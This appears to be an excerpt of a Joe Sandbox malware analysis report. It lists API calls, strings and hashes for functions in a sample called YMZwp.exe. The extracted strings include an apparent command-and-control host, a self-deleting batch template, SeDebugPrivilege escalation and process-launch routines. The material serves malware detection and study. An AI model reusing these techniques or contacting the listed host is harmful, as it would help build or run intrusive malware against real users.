                                      • Part of subcall function 00B3185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31878
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31880
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31890
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31894
                                    • wsprintfA.USER32 ref: 00B315AA
                                    • wsprintfA.USER32 ref: 00B315C6
                                    • lstrlen.KERNEL32(?), ref: 00B315D2
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00B315EE
                                    • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00B31609
                                    • CloseHandle.KERNEL32(00000000), ref: 00B31612
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00B3162D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\YMZwp.exe$open
                                    • API String ID: 617340118-2860072701
                                    • Opcode ID: 0ce8669ee8f7d590e69fb6cbff17bd899a705972957cd34d31ccf9b4857c000a
                                    • Instruction ID: 20d827a87aee666583d98f4a879712efc242ae749d1cdae51a439876306bdef6
                                    • Opcode Fuzzy Hash: 0ce8669ee8f7d590e69fb6cbff17bd899a705972957cd34d31ccf9b4857c000a
                                    • Instruction Fuzzy Hash: D5115176A011287AD72097A59C89EEF7BECDF59B61F100491F549E3050EE749B84CBB0
                                    Function 00B3120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00B31400), ref: 00B31226
                                    • GetProcAddress.KERNEL32(00000000), ref: 00B3122D
                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00B31400), ref: 00B3123F
                                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00B31400), ref: 00B31250
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,00B31400), ref: 00B3129E
                                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,00B31400), ref: 00B312B0
                                    • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,00B31400), ref: 00B312F5
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00B31400), ref: 00B3130A
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B31262
                                    • ZwQuerySystemInformation, xrefs: 00B31212
                                    • ntdll.dll, xrefs: 00B31219
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe$ZwQuerySystemInformation$ntdll.dll
                                    • API String ID: 1500695312-1620186553
                                    • Opcode ID: 17668496ca75679168f2ef5af2eed5c71dec5e9ccdf62c4787d05c54509b8cf6
                                    • Instruction ID: b54f6dc89bd7d0aaba94c7135981fb09364aaeb57f15271ade61a96ddb4bf027
                                    • Opcode Fuzzy Hash: 17668496ca75679168f2ef5af2eed5c71dec5e9ccdf62c4787d05c54509b8cf6
                                    • Instruction Fuzzy Hash: 3D21CE71605311BBD7209B69CC48BAFBAECFB85F01F200D68F645E7280CB70DA8487A5
                                    Function 00B3185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                    • srand.MSVCRT ref: 00B31878
                                    • rand.MSVCRT ref: 00B31880
                                    • srand.MSVCRT ref: 00B31890
                                    • rand.MSVCRT ref: 00B31894
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Timerandsrand$FileSystem
                                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 4106363736-3273462101
                                    • Opcode ID: 85b0085b10a0c03c13f066eb159bd997b6b5f01893f35bf5c89e634dc162be85
                                    • Instruction ID: 00d7d1f8d5215d63ebedf65b0fee454e1af7e847d927bed5edce5229ed4d2417
                                    • Opcode Fuzzy Hash: 85b0085b10a0c03c13f066eb159bd997b6b5f01893f35bf5c89e634dc162be85
                                    • Instruction Fuzzy Hash: D1E0D877A00218BBD704A7F9EC46D9FBBECDE84561B200527F600D3250E971FD448AB4
                                    Function 00B32692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,76F8E800,?,?,00B329DB,?,00000001), ref: 00B326A7
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,76F8E800,?,?,00B329DB,?,00000001), ref: 00B326B5
                                    • lstrlen.KERNEL32(?), ref: 00B326C4
                                    • ??2@YAPAXI@Z.MSVCRT ref: 00B326CE
                                    • lstrcpy.KERNEL32(00000004,?), ref: 00B326E3
                                    • lstrcpy.KERNEL32(?,00000004), ref: 00B3271F
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00B3272D
                                    • SetEvent.KERNEL32 ref: 00B3273C
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                                    • String ID:
                                    • API String ID: 41106472-0
                                    • Opcode ID: 08a4926599727c55558b465c2089bcdc29d1e40c3525aa899239cf7f38c18e27
                                    • Instruction ID: 61dae91a4d23115f8ea3874670afdbf6203f085167504667dc7f76d17c6bac8c
                                    • Opcode Fuzzy Hash: 08a4926599727c55558b465c2089bcdc29d1e40c3525aa899239cf7f38c18e27
                                    • Instruction Fuzzy Hash: E811BF36540210EFCB359F15EC8895F7BE9FB84B21B344065F85887220DB30AD85CF90
                                    Function 00B31B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • .exe, xrefs: 00B31C57
                                    • QsuwNenTLwkroUESmisHTgKakCflhFwsygbcogWnqIMXhHirhOtjzZAKVducLHBOzAjvKXxZFVtNPqlRmufUXBIzGbafkDGDravOyCQeJimMyWAdEJPcEYpRYFoxUTBeGSbdJPlvRYnDCVqSQxZMtpIpNLjW, xrefs: 00B31B8A, 00B31B9C, 00B31C15, 00B31C49
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: lstrcatmemcpymemsetrandsrand
                                    • String ID: .exe$QsuwNenTLwkroUESmisHTgKakCflhFwsygbcogWnqIMXhHirhOtjzZAKVducLHBOzAjvKXxZFVtNPqlRmufUXBIzGbafkDGDravOyCQeJimMyWAdEJPcEYpRYFoxUTBeGSbdJPlvRYnDCVqSQxZMtpIpNLjW
                                    • API String ID: 122620767-2651133296
                                    • Opcode ID: 75ca58c97ef3e34461d30c65a3c1c2deaa92880513471aaff99677da9be75403
                                    • Instruction ID: ec3b2c01df9457909d5ecf1df727f78a996a9da90c53468c2d344f48e4b78c24
                                    • Opcode Fuzzy Hash: 75ca58c97ef3e34461d30c65a3c1c2deaa92880513471aaff99677da9be75403
                                    • Instruction Fuzzy Hash: 68215E32E441906ED315133D6C80B6E7FC8CFB7B11F3648E9F9855B1B2EA641D898264
                                    Function 00B3189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 00B318B1
                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,76F90F00,753C8400), ref: 00B318D3
                                    • CloseHandle.KERNEL32(00B32549), ref: 00B318E9
                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B318F0
                                    • GetExitCodeProcess.KERNEL32(?,00B32549), ref: 00B31901
                                    • CloseHandle.KERNEL32(?), ref: 00B3190A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                                    • String ID:
                                    • API String ID: 876959470-0
                                    • Opcode ID: 306e97b1293b35d4138eb0867b90321c98b7206bbceeebc9392056a37148df59
                                    • Instruction ID: 10d5eadf2ec0939a150ea301b430cbc9af6e4321273a9121f759c783f44938bd
                                    • Opcode Fuzzy Hash: 306e97b1293b35d4138eb0867b90321c98b7206bbceeebc9392056a37148df59
                                    • Instruction Fuzzy Hash: 54018472901128BBCB216BD5DC48EDF7FBDFF85731F204121F915A61A0DA358A58CBA0
                                    Function 00B3139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B313BC
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B313DA
                                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B31448
                                      • Part of subcall function 00B3119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\YMZwp.exe,?,?,?,?,?,?,00B313EF), ref: 00B311AB
                                      • Part of subcall function 00B3119F: OpenProcessToken.ADVAPI32(00000000,00000028,00B313EF,?,?,?,?,?,?,00B313EF), ref: 00B311BB
                                      • Part of subcall function 00B3119F: AdjustTokenPrivileges.ADVAPI32(00B313EF,00000000,?,00000010,00000000,00000000), ref: 00B311EB
                                      • Part of subcall function 00B3119F: CloseHandle.KERNEL32(00B313EF), ref: 00B311FA
                                      • Part of subcall function 00B3119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00B313EF), ref: 00B31203
                                    Strings
                                    • C:\Users\user\AppData\Local\Temp\YMZwp.exe, xrefs: 00B313A8
                                    • SeDebugPrivilege, xrefs: 00B313D3
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe$SeDebugPrivilege
                                    • API String ID: 4123949106-3791149553
                                    • Opcode ID: 3ada9a0cc24ffe6d8f2357421ad4b80f96eced5d65d661443f4b05b4ca5a4c71
                                    • Instruction ID: cb36a5d9ba67cf02ab694e5030b20921b3dc19a2a1514fad7e7dfe6c9ddb5109
                                    • Opcode Fuzzy Hash: 3ada9a0cc24ffe6d8f2357421ad4b80f96eced5d65d661443f4b05b4ca5a4c71
                                    • Instruction Fuzzy Hash: B431DD71D40219AAEF20ABA98C45FEFBBFCEB44705F3049A9E505B6241D6709E49CF60
                                    Function 00B31319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00B31334
                                    • GetProcAddress.KERNEL32(00000000), ref: 00B3133B
                                    • memset.MSVCRT ref: 00B31359
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProcmemset
                                    • String ID: NtSystemDebugControl$ntdll.dll
                                    • API String ID: 3137504439-2438149413
                                    • Opcode ID: a74a94678b0faf155541732d7499ec15d97f2b7748a5d3708fe25fcc7ebf9b1a
                                    • Instruction ID: 0d30a009d335d93aca38dab7d3ce1bbcce19533464af50574fa4744fcfe01650
                                    • Opcode Fuzzy Hash: a74a94678b0faf155541732d7499ec15d97f2b7748a5d3708fe25fcc7ebf9b1a
                                    • Instruction Fuzzy Hash: 9901C071600309BFDB10DF98ECC5A6FBBECFB00714F2005AAF901A2150E7709644CA55
                                    Function 00B31DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                                    • String ID:
                                    • API String ID: 3636361484-0
                                    • Opcode ID: f3ae4aa790391c8d07c19e34096f6dbc3ae376576e90a0d147f8f7b930a94fb2
                                    • Instruction ID: 5c956888b130278ac36718c678fb6c59a117f1cf3e76e8154ffe45e95e3ddbb8
                                    • Opcode Fuzzy Hash: f3ae4aa790391c8d07c19e34096f6dbc3ae376576e90a0d147f8f7b930a94fb2
                                    • Instruction Fuzzy Hash: BD01F9B39042297FEB205764EC48FDB77DCDB04311F3404A6EA45E3090EF75AA848BA0
                                    Function 00B36014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00B3603C
                                    • GetProcAddress.KERNEL32(00000000,00B36064), ref: 00B3604F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: AddressHandleModuleProc
                                    • String ID: kernel32.dll
                                    • API String ID: 1646373207-1793498882
                                    • Opcode ID: fde262e058c6672e8b75fc7161aae9cac166cd0d1f285fd9cb1d124aafddd6a2
                                    • Instruction ID: 6758ca19088ad4ffecc276e2d787b2335aa1769ada56790a03bc37698ca779f5
                                    • Opcode Fuzzy Hash: fde262e058c6672e8b75fc7161aae9cac166cd0d1f285fd9cb1d124aafddd6a2
                                    • Instruction Fuzzy Hash: 18F0F6B15442899FDF70CE68CC84BDE37E4EB05700F60446AEA09CB241CB3486058B24

                                    Executed Functions

                                    Function 04980005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000027.00000002.3810643262.0000000004980000.00000040.00000001.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_39_2_4980000_cscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns0$open$purity_control_90833
                                    • API String ID: 0-1416619028
                                    • Opcode ID: 2595e55ff487a040ec8a788b7eda5c8d59e3ecd567dc9b7775afb594ba49bc50
                                    • Instruction ID: 0eefb5951fde16b463f9c739a3c6c873654fcb887243951eea6cf71579284827
                                    • Opcode Fuzzy Hash: 2595e55ff487a040ec8a788b7eda5c8d59e3ecd567dc9b7775afb594ba49bc50
                                    • Instruction Fuzzy Hash: 4B616171640288AFEF10EF64CD49FEA3768EB44B15F450429EE09BE1F0D6B16648C71A
                                    Function 049806D2 Relevance: .3, Instructions: 256COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000027.00000002.3810643262.0000000004980000.00000040.00000001.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_39_2_4980000_cscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction ID: 9d20abd2481492e391923013fcabb7c2bf4140139b4795a6ce3f639d59cf8ee2
                                    • Opcode Fuzzy Hash: f9939f4a1a6ffcb6437ec841425aad15b476a2f1f311277c3848372b926bea02
                                    • Instruction Fuzzy Hash: 00B12B75A002898FEF10DF18CD44BA937E9BF44304F494929DD0DAF261D776BA88CB4A

                                    Non-executed Functions

                                    Function 04980260 Relevance: 5.1, Strings: 4, Instructions: 52COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000027.00000002.3810643262.0000000004980000.00000040.00000001.00020000.00000000.sdmp, Offset: 04980000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_39_2_4980000_cscript.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                    • API String ID: 0-1163154406
                                    • Opcode ID: e21da19acf43ca4be23f49ad3665f7bddf3231c6d67d13a3599f374a33d2e894
                                    • Instruction ID: 2ee825716111865ef2f587460e93afb856a7a3225dbe523171e64a09a7fe5c50
                                    • Opcode Fuzzy Hash: e21da19acf43ca4be23f49ad3665f7bddf3231c6d67d13a3599f374a33d2e894
                                    • Instruction Fuzzy Hash: 4A11E171244789AFEF50EEA48D4DFDD376DAF44B01F440425FA09EE0E0DAB1A244876B